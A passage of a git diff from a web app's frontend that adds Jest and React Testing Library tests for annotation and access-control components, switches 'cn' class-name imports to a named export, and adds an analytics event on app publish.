: null) + +const mockNotify = Toast.notify as jest.Mock +const addAnnotationMock = addAnnotation as jest.Mock +const delAnnotationMock = delAnnotation as jest.Mock +const delAnnotationsMock = delAnnotations as jest.Mock +const fetchAnnotationConfigMock = fetchAnnotationConfig as jest.Mock +const fetchAnnotationListMock = fetchAnnotationList as jest.Mock +const queryAnnotationJobStatusMock = queryAnnotationJobStatus as jest.Mock +const useProviderContextMock = useProviderContext as jest.Mock + +const appDetail = { + id: 'app-id', + mode: AppModeEnum.CHAT, +} as App + +const createAnnotation = (overrides: Partial = {}): AnnotationItem => ({ + id: overrides.id ?? 'annotation-1', + question: overrides.question ?? 'Question 1', + answer: overrides.answer ?? 'Answer 1', + created_at: overrides.created_at ?? 1700000000, + hit_count: overrides.hit_count ?? 0, +}) + +const renderComponent = () => render() + +describe('Annotation', () => { + beforeEach(() => { + jest.clearAllMocks() + latestListProps = undefined + fetchAnnotationConfigMock.mockResolvedValue({ + id: 'config-id', + enabled: false, + embedding_model: { + embedding_model_name: 'model', + embedding_provider_name: 'provider', + }, + score_threshold: 0.5, + }) + fetchAnnotationListMock.mockResolvedValue({ data: [], total: 0 }) + queryAnnotationJobStatusMock.mockResolvedValue({ job_status: JobStatus.completed }) + useProviderContextMock.mockReturnValue({ + plan: { + usage: { annotatedResponse: 0 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: false, + }) + }) + + it('should render empty element when no annotations are returned', async () => { + renderComponent() + + expect(await screen.findByTestId('empty-element')).toBeInTheDocument() + expect(fetchAnnotationListMock).toHaveBeenCalledWith(appDetail.id, expect.objectContaining({ + page: 1, + keyword: '', + })) + }) + + it('should handle annotation creation and refresh list data', async () => { + const annotation = createAnnotation() + fetchAnnotationListMock.mockResolvedValue({ data: [annotation], total: 1 }) + addAnnotationMock.mockResolvedValue(undefined) + + renderComponent() + + await screen.findByTestId('list') + fireEvent.click(screen.getByTestId('trigger-add')) + + await waitFor(() => { + expect(addAnnotationMock).toHaveBeenCalledWith(appDetail.id, { question: 'new question', answer: 'new answer' }) + expect(mockNotify).toHaveBeenCalledWith(expect.objectContaining({ + message: 'common.api.actionSuccess', + type: 'success', + })) + }) + expect(fetchAnnotationListMock).toHaveBeenCalledTimes(2) + }) + + it('should support viewing items and running batch deletion success flow', async () => { + const annotation = createAnnotation() + fetchAnnotationListMock.mockResolvedValue({ data: [annotation], total: 1 }) + delAnnotationsMock.mockResolvedValue(undefined) + delAnnotationMock.mockResolvedValue(undefined) + + renderComponent() + await screen.findByTestId('list') + + await act(async () => { + latestListProps.onSelectedIdsChange([annotation.id]) + }) + await waitFor(() => { + expect(latestListProps.selectedIds).toEqual([annotation.id]) + }) + + await act(async () => { + await latestListProps.onBatchDelete() + }) + await waitFor(() => { + expect(delAnnotationsMock).toHaveBeenCalledWith(appDetail.id, [annotation.id]) + expect(mockNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'success', + })) + expect(latestListProps.selectedIds).toEqual([]) + }) + + fireEvent.click(screen.getByTestId('list-view')) + expect(screen.getByTestId('view-modal')).toBeInTheDocument() + + await act(async () => { + fireEvent.click(screen.getByTestId('view-modal-remove')) + }) + await waitFor(() => { + expect(delAnnotationMock).toHaveBeenCalledWith(appDetail.id, annotation.id) + }) + }) + + it('should show an error notification when batch deletion fails', async () => { + const annotation = createAnnotation() + fetchAnnotationListMock.mockResolvedValue({ data: [annotation], total: 1 }) + const error = new Error('failed') + delAnnotationsMock.mockRejectedValue(error) + + renderComponent() + await screen.findByTestId('list') + + await act(async () => { + latestListProps.onSelectedIdsChange([annotation.id]) + }) + await waitFor(() => { + expect(latestListProps.selectedIds).toEqual([annotation.id]) + }) + + await act(async () => { + await latestListProps.onBatchDelete() + }) + + await waitFor(() => { + expect(mockNotify).toHaveBeenCalledWith({ + type: 'error', + message: error.message, + }) + expect(latestListProps.selectedIds).toEqual([annotation.id]) + }) + }) +}) diff --git a/web/app/components/app/annotation/index.tsx b/web/app/components/app/annotation/index.tsx index 32d0c799fc..2d639c91e4 100644 --- a/web/app/components/app/annotation/index.tsx +++ b/web/app/components/app/annotation/index.tsx @@ -25,7 +25,7 @@ import { sleep } from '@/utils' import { useProviderContext } from '@/context/provider-context' import AnnotationFullModal from '@/app/components/billing/annotation-full/modal' import { type App, AppModeEnum } from '@/types/app' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { delAnnotations } from '@/service/annotation' type Props = { diff --git a/web/app/components/app/annotation/list.spec.tsx b/web/app/components/app/annotation/list.spec.tsx new file mode 100644 index 0000000000..9f8d4c8855 --- /dev/null +++ b/web/app/components/app/annotation/list.spec.tsx @@ -0,0 +1,116 @@ +import React from 'react' +import { fireEvent, render, screen, within } from '@testing-library/react' +import List from './list' +import type { AnnotationItem } from './type' + +const mockFormatTime = jest.fn(() => 'formatted-time') + +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: mockFormatTime, + }), +})) + +const createAnnotation = (overrides: Partial = {}): AnnotationItem => ({ + id: overrides.id ?? 'annotation-id', + question: overrides.question ?? 'question 1', + answer: overrides.answer ?? 'answer 1', + created_at: overrides.created_at ?? 1700000000, + hit_count: overrides.hit_count ?? 2, +}) + +const getCheckboxes = (container: HTMLElement) => container.querySelectorAll('[data-testid^="checkbox"]') + +describe('List', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should render annotation rows and call onView when clicking a row', () => { + const item = createAnnotation() + const onView = jest.fn() + + render( + , + ) + + fireEvent.click(screen.getByText(item.question)) + + expect(onView).toHaveBeenCalledWith(item) + expect(mockFormatTime).toHaveBeenCalledWith(item.created_at, 'appLog.dateTimeFormat') + }) + + it('should toggle single and bulk selection states', () => { + const list = [createAnnotation({ id: 'a', question: 'A' }), createAnnotation({ id: 'b', question: 'B' })] + const onSelectedIdsChange = jest.fn() + const { container, rerender } = render( + , + ) + + const checkboxes = getCheckboxes(container) + fireEvent.click(checkboxes[1]) + expect(onSelectedIdsChange).toHaveBeenCalledWith(['a']) + + rerender( + , + ) + const updatedCheckboxes = getCheckboxes(container) + fireEvent.click(updatedCheckboxes[1]) + expect(onSelectedIdsChange).toHaveBeenCalledWith([]) + + fireEvent.click(updatedCheckboxes[0]) + expect(onSelectedIdsChange).toHaveBeenCalledWith(['a', 'b']) + }) + + it('should confirm before removing an annotation and expose batch actions', async () => { + const item = createAnnotation({ id: 'to-delete', question: 'Delete me' }) + const onRemove = jest.fn() + render( + , + ) + + const row = screen.getByText(item.question).closest('tr') as HTMLTableRowElement + const actionButtons = within(row).getAllByRole('button') + fireEvent.click(actionButtons[1]) + + expect(await screen.findByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument() + const confirmButton = await screen.findByRole('button', { name: 'common.operation.confirm' }) + fireEvent.click(confirmButton) + expect(onRemove).toHaveBeenCalledWith(item.id) + + expect(screen.getByText('appAnnotation.batchAction.selected')).toBeInTheDocument() + }) +}) diff --git a/web/app/components/app/annotation/list.tsx b/web/app/components/app/annotation/list.tsx index 4135b4362e..62a0c50e60 100644 --- a/web/app/components/app/annotation/list.tsx +++ b/web/app/components/app/annotation/list.tsx @@ -7,7 +7,7 @@ import type { AnnotationItem } from './type' import RemoveAnnotationConfirmModal from './remove-annotation-confirm-modal' import ActionButton from '@/app/components/base/action-button' import useTimestamp from '@/hooks/use-timestamp' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Checkbox from '@/app/components/base/checkbox' import BatchAction from './batch-action' diff --git a/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..347ba7880b --- /dev/null +++ b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import RemoveAnnotationConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appDebug.feature.annotation.removeConfirm': 'Remove annotation?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('RemoveAnnotationConfirmModal', () => { + // Rendering behavior driven by isShow and translations + describe('Rendering', () => { + test('should display the confirm modal when visible', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Remove annotation?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render modal content when hidden', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Remove annotation?')).not.toBeInTheDocument() + }) + }) + + // User interactions with confirm and cancel buttons + describe('Interactions', () => { + test('should call onHide when cancel button is clicked', () => { + const onHide = jest.fn() + const onRemove = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onRemove).not.toHaveBeenCalled() + }) + + test('should call onRemove when confirm button is clicked', () => { + const onHide = jest.fn() + const onRemove = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onRemove).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/annotation/type.ts b/web/app/components/app/annotation/type.ts index 5df6f51ace..e2f2264f07 100644 --- a/web/app/components/app/annotation/type.ts +++ b/web/app/components/app/annotation/type.ts @@ -12,6 +12,12 @@ export type AnnotationItem = { hit_count: number } +export type AnnotationCreateResponse = AnnotationItem & { + account?: { + name?: string + } +} + export type HitHistoryItem = { id: string question: string diff --git a/web/app/components/app/annotation/view-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/view-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..dec0ad0c01 --- /dev/null +++ b/web/app/components/app/annotation/view-annotation-modal/index.spec.tsx @@ -0,0 +1,158 @@ +import React from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import ViewAnnotationModal from './index' +import type { AnnotationItem, HitHistoryItem } from '../type' +import { fetchHitHistoryList } from '@/service/annotation' + +const mockFormatTime = jest.fn(() => 'formatted-time') + +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: mockFormatTime, + }), +})) + +jest.mock('@/service/annotation', () => ({ + fetchHitHistoryList: jest.fn(), +})) + +jest.mock('../edit-annotation-modal/edit-item', () => { + const EditItemType = { + Query: 'query', + Answer: 'answer', + } + return { + __esModule: true, + default: ({ type, content, onSave }: { type: string; content: string; onSave: (value: string) => void }) => ( +
+
{content}
+ +
+ ), + EditItemType, + } +}) + +const fetchHitHistoryListMock = fetchHitHistoryList as jest.Mock + +const createAnnotationItem = (overrides: Partial = {}): AnnotationItem => ({ + id: overrides.id ?? 'annotation-id', + question: overrides.question ?? 'question', + answer: overrides.answer ?? 'answer', + created_at: overrides.created_at ?? 1700000000, + hit_count: overrides.hit_count ?? 0, +}) + +const createHitHistoryItem = (overrides: Partial = {}): HitHistoryItem => ({ + id: overrides.id ?? 'hit-id', + question: overrides.question ?? 'query', + match: overrides.match ?? 'match', + response: overrides.response ?? 'response', + source: overrides.source ?? 'source', + score: overrides.score ?? 0.42, + created_at: overrides.created_at ?? 1700000000, +}) + +const renderComponent = (props?: Partial>) => { + const item = createAnnotationItem() + const mergedProps: React.ComponentProps = { + appId: 'app-id', + isShow: true, + onHide: jest.fn(), + item, + onSave: jest.fn().mockResolvedValue(undefined), + onRemove: jest.fn().mockResolvedValue(undefined), + ...props, + } + return { + ...render(), + props: mergedProps, + } +} + +describe('ViewAnnotationModal', () => { + beforeEach(() => { + jest.clearAllMocks() + fetchHitHistoryListMock.mockResolvedValue({ data: [], total: 0 }) + }) + + it('should render annotation tab and allow saving updated query', async () => { + // Arrange + const { props } = renderComponent() + + await waitFor(() => { + expect(fetchHitHistoryListMock).toHaveBeenCalled() + }) + + // Act + fireEvent.click(screen.getByTestId('edit-query')) + + // Assert + await waitFor(() => { + expect(props.onSave).toHaveBeenCalledWith('query-updated', props.item.answer) + }) + }) + + it('should render annotation tab and allow saving updated answer', async () => { + // Arrange + const { props } = renderComponent() + + await waitFor(() => { + expect(fetchHitHistoryListMock).toHaveBeenCalled() + }) + + // Act + fireEvent.click(screen.getByTestId('edit-answer')) + + // Assert + await waitFor(() => { + expect(props.onSave).toHaveBeenCalledWith(props.item.question, 'answer-updated') + }, + ) + }) + + it('should switch to hit history tab and show no data message', async () => { + // Arrange + const { props } = renderComponent() + + await waitFor(() => { + expect(fetchHitHistoryListMock).toHaveBeenCalled() + }) + + // Act + fireEvent.click(screen.getByText('appAnnotation.viewModal.hitHistory')) + + // Assert + expect(await screen.findByText('appAnnotation.viewModal.noHitHistory')).toBeInTheDocument() + expect(mockFormatTime).toHaveBeenCalledWith(props.item.created_at, 'appLog.dateTimeFormat') + }) + + it('should render hit history entries with pagination badge when data exists', async () => { + const hits = [createHitHistoryItem({ question: 'user input' }), createHitHistoryItem({ id: 'hit-2', question: 'second' })] + fetchHitHistoryListMock.mockResolvedValue({ data: hits, total: 15 }) + + renderComponent() + + fireEvent.click(await screen.findByText('appAnnotation.viewModal.hitHistory')) + + expect(await screen.findByText('user input')).toBeInTheDocument() + expect(screen.getByText('15 appAnnotation.viewModal.hits')).toBeInTheDocument() + expect(mockFormatTime).toHaveBeenCalledWith(hits[0].created_at, 'appLog.dateTimeFormat') + }) + + it('should confirm before removing the annotation and hide on success', async () => { + const { props } = renderComponent() + + fireEvent.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + expect(await screen.findByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument() + + const confirmButton = await screen.findByRole('button', { name: 'common.operation.confirm' }) + fireEvent.click(confirmButton) + + await waitFor(() => { + expect(props.onRemove).toHaveBeenCalledTimes(1) + expect(props.onHide).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/annotation/view-annotation-modal/index.tsx b/web/app/components/app/annotation/view-annotation-modal/index.tsx index 8426ab0005..d21b177098 100644 --- a/web/app/components/app/annotation/view-annotation-modal/index.tsx +++ b/web/app/components/app/annotation/view-annotation-modal/index.tsx @@ -14,7 +14,7 @@ import TabSlider from '@/app/components/base/tab-slider-plain' import { fetchHitHistoryList } from '@/service/annotation' import { APP_PAGE_LIMIT } from '@/config' import useTimestamp from '@/hooks/use-timestamp' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type Props = { appId: string diff --git a/web/app/components/app/app-access-control/access-control-dialog.tsx b/web/app/components/app/app-access-control/access-control-dialog.tsx index ee3fa9650b..99cf6d7074 100644 --- a/web/app/components/app/app-access-control/access-control-dialog.tsx +++ b/web/app/components/app/app-access-control/access-control-dialog.tsx @@ -2,7 +2,7 @@ import { Fragment, useCallback } from 'react' import type { ReactNode } from 'react' import { Dialog, Transition } from '@headlessui/react' import { RiCloseLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type DialogProps = { className?: string diff --git a/web/app/components/app/app-access-control/access-control.spec.tsx b/web/app/components/app/app-access-control/access-control.spec.tsx new file mode 100644 index 0000000000..ea0e17de2e --- /dev/null +++ b/web/app/components/app/app-access-control/access-control.spec.tsx @@ -0,0 +1,389 @@ +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import AccessControl from './index' +import AccessControlDialog from './access-control-dialog' +import AccessControlItem from './access-control-item' +import AddMemberOrGroupDialog from './add-member-or-group-pop' +import SpecificGroupsOrMembers from './specific-groups-or-members' +import useAccessControlStore from '@/context/access-control-store' +import { useGlobalPublicStore } from '@/context/global-public-context' +import type { AccessControlAccount, AccessControlGroup, Subject } from '@/models/access-control' +import { AccessMode, SubjectType } from '@/models/access-control' +import Toast from '../../base/toast' +import { defaultSystemFeatures } from '@/types/feature' +import type { App } from '@/types/app' + +const mockUseAppWhiteListSubjects = jest.fn() +const mockUseSearchForWhiteListCandidates = jest.fn() +const mockMutateAsync = jest.fn() +const mockUseUpdateAccessMode = jest.fn(() => ({ + isPending: false, + mutateAsync: mockMutateAsync, +})) + +jest.mock('@/context/app-context', () => ({ + useSelector: (selector: (value: { userProfile: { email: string; id?: string; name?: string; avatar?: string; avatar_url?: string; is_password_set?: boolean } }) => T) => selector({ + userProfile: { + id: 'current-user', + name: 'Current User', + email: 'member@example.com', + avatar: '', + avatar_url: '', + is_password_set: true, + }, + }), +})) + +jest.mock('@/service/common', () => ({ + fetchCurrentWorkspace: jest.fn(), + fetchLangGeniusVersion: jest.fn(), + fetchUserProfile: jest.fn(), + getSystemFeatures: jest.fn(), +})) + +jest.mock('@/service/access-control', () => ({ + useAppWhiteListSubjects: (...args: unknown[]) => mockUseAppWhiteListSubjects(...args), + useSearchForWhiteListCandidates: (...args: unknown[]) => mockUseSearchForWhiteListCandidates(...args), + useUpdateAccessMode: () => mockUseUpdateAccessMode(), +})) + +jest.mock('@headlessui/react', () => { + const DialogComponent: any = ({ children, className, ...rest }: any) => ( +
{children}
+ ) + DialogComponent.Panel = ({ children, className, ...rest }: any) => ( +
{children}
+ ) + const DialogTitle = ({ children, className, ...rest }: any) => ( +
{children}
+ ) + const DialogDescription = ({ children, className, ...rest }: any) => ( +
{children}
+ ) + const TransitionChild = ({ children }: any) => ( + <>{typeof children === 'function' ? children({}) : children} + ) + const Transition = ({ show = true, children }: any) => ( + show ? <>{typeof children === 'function' ? children({}) : children} : null + ) + Transition.Child = TransitionChild + return { + Dialog: DialogComponent, + Transition, + DialogTitle, + Description: DialogDescription, + } +}) + +jest.mock('ahooks', () => { + const actual = jest.requireActual('ahooks') + return { + ...actual, + useDebounce: (value: unknown) => value, + } +}) + +const createGroup = (overrides: Partial = {}): AccessControlGroup => ({ + id: 'group-1', + name: 'Group One', + groupSize: 5, + ...overrides, +} as AccessControlGroup) + +const createMember = (overrides: Partial = {}): AccessControlAccount => ({ + id: 'member-1', + name: 'Member One', + email: 'member@example.com', + avatar: '', + avatarUrl: '', + ...overrides, +} as AccessControlAccount) + +const baseGroup = createGroup() +const baseMember = createMember() +const groupSubject: Subject = { + subjectId: baseGroup.id, + subjectType: SubjectType.GROUP, + groupData: baseGroup, +} as Subject +const memberSubject: Subject = { + subjectId: baseMember.id, + subjectType: SubjectType.ACCOUNT, + accountData: baseMember, +} as Subject + +const resetAccessControlStore = () => { + useAccessControlStore.setState({ + appId: '', + specificGroups: [], + specificMembers: [], + currentMenu: AccessMode.SPECIFIC_GROUPS_MEMBERS, + selectedGroupsForBreadcrumb: [], + }) +} + +const resetGlobalStore = () => { + useGlobalPublicStore.setState({ + systemFeatures: defaultSystemFeatures, + isGlobalPending: false, + }) +} + +beforeAll(() => { + class MockIntersectionObserver { + observe = jest.fn(() => undefined) + disconnect = jest.fn(() => undefined) + unobserve = jest.fn(() => undefined) + } + // @ts-expect-error jsdom does not implement IntersectionObserver + globalThis.IntersectionObserver = MockIntersectionObserver +}) + +beforeEach(() => { + jest.clearAllMocks() + resetAccessControlStore() + resetGlobalStore() + mockMutateAsync.mockResolvedValue(undefined) + mockUseUpdateAccessMode.mockReturnValue({ + isPending: false, + mutateAsync: mockMutateAsync, + }) + mockUseAppWhiteListSubjects.mockReturnValue({ + isPending: false, + data: { + groups: [baseGroup], + members: [baseMember], + }, + }) + mockUseSearchForWhiteListCandidates.mockReturnValue({ + isLoading: false, + isFetchingNextPage: false, + fetchNextPage: jest.fn(), + data: { pages: [{ currPage: 1, subjects: [groupSubject, memberSubject], hasMore: false }] }, + }) +}) + +// AccessControlItem handles selected vs. unselected styling and click state updates +describe('AccessControlItem', () => { + it('should update current menu when selecting a different access type', () => { + useAccessControlStore.setState({ currentMenu: AccessMode.PUBLIC }) + render( + + Organization Only + , + ) + + const option = screen.getByText('Organization Only').parentElement as HTMLElement + expect(option).toHaveClass('cursor-pointer') + + fireEvent.click(option) + + expect(useAccessControlStore.getState().currentMenu).toBe(AccessMode.ORGANIZATION) + }) + + it('should keep current menu when clicking the selected access type', () => { + useAccessControlStore.setState({ currentMenu: AccessMode.ORGANIZATION }) + render( + + Organization Only + , + ) + + const option = screen.getByText('Organization Only').parentElement as HTMLElement + fireEvent.click(option) + + expect(useAccessControlStore.getState().currentMenu).toBe(AccessMode.ORGANIZATION) + }) +}) + +// AccessControlDialog renders a headless UI dialog with a manual close control +describe('AccessControlDialog', () => { + it('should render dialog content when visible', () => { + render( + +
Dialog Content
+
, + ) + + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByText('Dialog Content')).toBeInTheDocument() + }) + + it('should trigger onClose when clicking the close control', async () => { + const handleClose = jest.fn() + const { container } = render( + +
Dialog Content
+
, + ) + + const closeButton = container.querySelector('.absolute.right-5.top-5') as HTMLElement + fireEvent.click(closeButton) + + await waitFor(() => { + expect(handleClose).toHaveBeenCalledTimes(1) + }) + }) +}) + +// SpecificGroupsOrMembers syncs store state with fetched data and supports removals +describe('SpecificGroupsOrMembers', () => { + it('should render collapsed view when not in specific selection mode', () => { + useAccessControlStore.setState({ currentMenu: AccessMode.ORGANIZATION }) + + render() + + expect(screen.getByText('app.accessControlDialog.accessItems.specific')).toBeInTheDocument() + expect(screen.queryByText(baseGroup.name)).not.toBeInTheDocument() + }) + + it('should show loading state while pending', async () => { + useAccessControlStore.setState({ appId: 'app-1', currentMenu: AccessMode.SPECIFIC_GROUPS_MEMBERS }) + mockUseAppWhiteListSubjects.mockReturnValue({ + isPending: true, + data: undefined, + }) + + const { container } = render() + + await waitFor(() => { + expect(container.querySelector('.spin-animation')).toBeInTheDocument() + }) + }) + + it('should render fetched groups and members and support removal', async () => { + useAccessControlStore.setState({ appId: 'app-1', currentMenu: AccessMode.SPECIFIC_GROUPS_MEMBERS }) + + render() + + await waitFor(() => { + expect(screen.getByText(baseGroup.name)).toBeInTheDocument() + expect(screen.getByText(baseMember.name)).toBeInTheDocument() + }) + + const groupItem = screen.getByText(baseGroup.name).closest('div') + const groupRemove = groupItem?.querySelector('.h-4.w-4.cursor-pointer') as HTMLElement + fireEvent.click(groupRemove) + + await waitFor(() => { + expect(screen.queryByText(baseGroup.name)).not.toBeInTheDocument() + }) + + const memberItem = screen.getByText(baseMember.name).closest('div') + const memberRemove = memberItem?.querySelector('.h-4.w-4.cursor-pointer') as HTMLElement + fireEvent.click(memberRemove) + + await waitFor(() => { + expect(screen.queryByText(baseMember.name)).not.toBeInTheDocument() + }) + }) +}) + +// AddMemberOrGroupDialog renders search results and updates store selections +describe('AddMemberOrGroupDialog', () => { + it('should open search popover and display candidates', async () => { + const user = userEvent.setup() + + render() + + await user.click(screen.getByText('common.operation.add')) + + expect(screen.getByPlaceholderText('app.accessControlDialog.operateGroupAndMember.searchPlaceholder')).toBeInTheDocument() + expect(screen.getByText(baseGroup.name)).toBeInTheDocument() + expect(screen.getByText(baseMember.name)).toBeInTheDocument() + }) + + it('should allow selecting members and expanding groups', async () => { + const user = userEvent.setup() + render() + + await user.click(screen.getByText('common.operation.add')) + + const expandButton = screen.getByText('app.accessControlDialog.operateGroupAndMember.expand') + await user.click(expandButton) + expect(useAccessControlStore.getState().selectedGroupsForBreadcrumb).toEqual([baseGroup]) + + const memberLabel = screen.getByText(baseMember.name) + const memberCheckbox = memberLabel.parentElement?.previousElementSibling as HTMLElement + fireEvent.click(memberCheckbox) + + expect(useAccessControlStore.getState().specificMembers).toEqual([baseMember]) + }) + + it('should show empty state when no candidates are returned', async () => { + mockUseSearchForWhiteListCandidates.mockReturnValue({ + isLoading: false, + isFetchingNextPage: false, + fetchNextPage: jest.fn(), + data: { pages: [] }, + }) + + const user = userEvent.setup() + render() + + await user.click(screen.getByText('common.operation.add')) + + expect(screen.getByText('app.accessControlDialog.operateGroupAndMember.noResult')).toBeInTheDocument() + }) +}) + +// AccessControl integrates dialog, selection items, and confirm flow +describe('AccessControl', () => { + it('should initialize menu from app and call update on confirm', async () => { + const onClose = jest.fn() + const onConfirm = jest.fn() + const toastSpy = jest.spyOn(Toast, 'notify').mockReturnValue({}) + useAccessControlStore.setState({ + specificGroups: [baseGroup], + specificMembers: [baseMember], + }) + const app = { + id: 'app-id-1', + access_mode: AccessMode.SPECIFIC_GROUPS_MEMBERS, + } as App + + render( + , + ) + + await waitFor(() => { + expect(useAccessControlStore.getState().currentMenu).toBe(AccessMode.SPECIFIC_GROUPS_MEMBERS) + }) + + fireEvent.click(screen.getByText('common.operation.confirm')) + + await waitFor(() => { + expect(mockMutateAsync).toHaveBeenCalledWith({ + appId: app.id, + accessMode: AccessMode.SPECIFIC_GROUPS_MEMBERS, + subjects: [ + { subjectId: baseGroup.id, subjectType: SubjectType.GROUP }, + { subjectId: baseMember.id, subjectType: SubjectType.ACCOUNT }, + ], + }) + expect(toastSpy).toHaveBeenCalled() + expect(onConfirm).toHaveBeenCalled() + }) + }) + + it('should expose the external members tip when SSO is disabled', () => { + const app = { + id: 'app-id-2', + access_mode: AccessMode.PUBLIC, + } as App + + render( + , + ) + + expect(screen.getByText('app.accessControlDialog.accessItems.external')).toBeInTheDocument() + expect(screen.getByText('app.accessControlDialog.accessItems.anyone')).toBeInTheDocument() + }) +}) diff --git a/web/app/components/app/app-access-control/add-member-or-group-pop.tsx b/web/app/components/app/app-access-control/add-member-or-group-pop.tsx index e9519aeedf..17263fdd46 100644 --- a/web/app/components/app/app-access-control/add-member-or-group-pop.tsx +++ b/web/app/components/app/app-access-control/add-member-or-group-pop.tsx @@ -11,7 +11,7 @@ import Input from '../../base/input' import { PortalToFollowElem, PortalToFollowElemContent, PortalToFollowElemTrigger } from '../../base/portal-to-follow-elem' import Loading from '../../base/loading' import useAccessControlStore from '../../../../context/access-control-store' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { useSearchForWhiteListCandidates } from '@/service/access-control' import type { AccessControlAccount, AccessControlGroup, Subject, SubjectAccount, SubjectGroup } from '@/models/access-control' import { SubjectType } from '@/models/access-control' @@ -32,7 +32,7 @@ export default function AddMemberOrGroupDialog() { const anchorRef = useRef(null) useEffect(() => { - const hasMore = data?.pages?.[0].hasMore ?? false + const hasMore = data?.pages?.[0]?.hasMore ?? false let observer: IntersectionObserver | undefined if (anchorRef.current) { observer = new IntersectionObserver((entries) => { @@ -106,7 +106,7 @@ function SelectedGroupsBreadCrumb() { setSelectedGroupsForBreadcrumb([]) }, [setSelectedGroupsForBreadcrumb]) return
- 0 && 'cursor-pointer text-text-accent')} onClick={handleReset}>{t('app.accessControlDialog.operateGroupAndMember.allMembers')} + 0 && 'cursor-pointer text-text-accent')} onClick={handleReset}>{t('app.accessControlDialog.operateGroupAndMember.allMembers')} {selectedGroupsForBreadcrumb.map((group, index) => { return
/ @@ -198,7 +198,7 @@ type BaseItemProps = { children: React.ReactNode } function BaseItem({ children, className }: BaseItemProps) { - return
+ return
{children}
} diff --git a/web/app/components/app/app-publisher/index.tsx b/web/app/components/app/app-publisher/index.tsx index 2dc45e1337..5aea337f85 100644 --- a/web/app/components/app/app-publisher/index.tsx +++ b/web/app/components/app/app-publisher/index.tsx @@ -51,6 +51,7 @@ import { AppModeEnum } from '@/types/app' import type { PublishWorkflowParams } from '@/types/workflow' import { basePath } from '@/utils/var' import UpgradeBtn from '@/app/components/billing/upgrade-btn' +import { trackEvent } from '@/app/components/base/amplitude' const ACCESS_MODE_MAP: Record = { [AccessMode.ORGANIZATION]: { @@ -189,11 +190,12 @@ const AppPublisher = ({ try { await onPublish?.(params) setPublished(true) + trackEvent('app_published_time', { action_mode: 'app', app_id: appDetail?.id, app_name: appDetail?.name }) } catch { setPublished(false) } - }, [onPublish]) + }, [appDetail, onPublish]) const handleRestore = useCallback(async () => { try { diff --git a/web/app/components/app/app-publisher/suggested-action.tsx b/web/app/components/app/app-publisher/suggested-action.tsx index 2535de6654..154bacc361 100644 --- a/web/app/components/app/app-publisher/suggested-action.tsx +++ b/web/app/components/app/app-publisher/suggested-action.tsx @@ -1,6 +1,6 @@ import type { HTMLProps, PropsWithChildren } from 'react' import { RiArrowRightUpLine } from '@remixicon/react' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' export type SuggestedActionProps = PropsWithChildren & { icon?: React.ReactNode @@ -19,11 +19,9 @@ const SuggestedAction = ({ icon, link, disabled, children, className, onClick, . href={disabled ? undefined : link} target='_blank' rel='noreferrer' - className={classNames( - 'flex items-center justify-start gap-2 rounded-lg bg-background-section-burn px-2.5 py-2 text-text-secondary transition-colors [&:not(:first-child)]:mt-1', + className={cn('flex items-center justify-start gap-2 rounded-lg bg-background-section-burn px-2.5 py-2 text-text-secondary transition-colors [&:not(:first-child)]:mt-1', disabled ? 'cursor-not-allowed opacity-30 shadow-xs' : 'cursor-pointer text-text-secondary hover:bg-state-accent-hover hover:text-text-accent', - className, - )} + className)} onClick={handleClick} {...props} > diff --git a/web/app/components/app/configuration/base/feature-panel/index.tsx b/web/app/components/app/configuration/base/feature-panel/index.tsx index ec5ab96d76..c9ebfefbe5 100644 --- a/web/app/components/app/configuration/base/feature-panel/index.tsx +++ b/web/app/components/app/configuration/base/feature-panel/index.tsx @@ -1,7 +1,7 @@ 'use client' import type { FC, ReactNode } from 'react' import React from 'react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' export type IFeaturePanelProps = { className?: string diff --git a/web/app/components/app/configuration/base/group-name/index.spec.tsx b/web/app/components/app/configuration/base/group-name/index.spec.tsx new file mode 100644 index 0000000000..ac504247f2 --- /dev/null +++ b/web/app/components/app/configuration/base/group-name/index.spec.tsx @@ 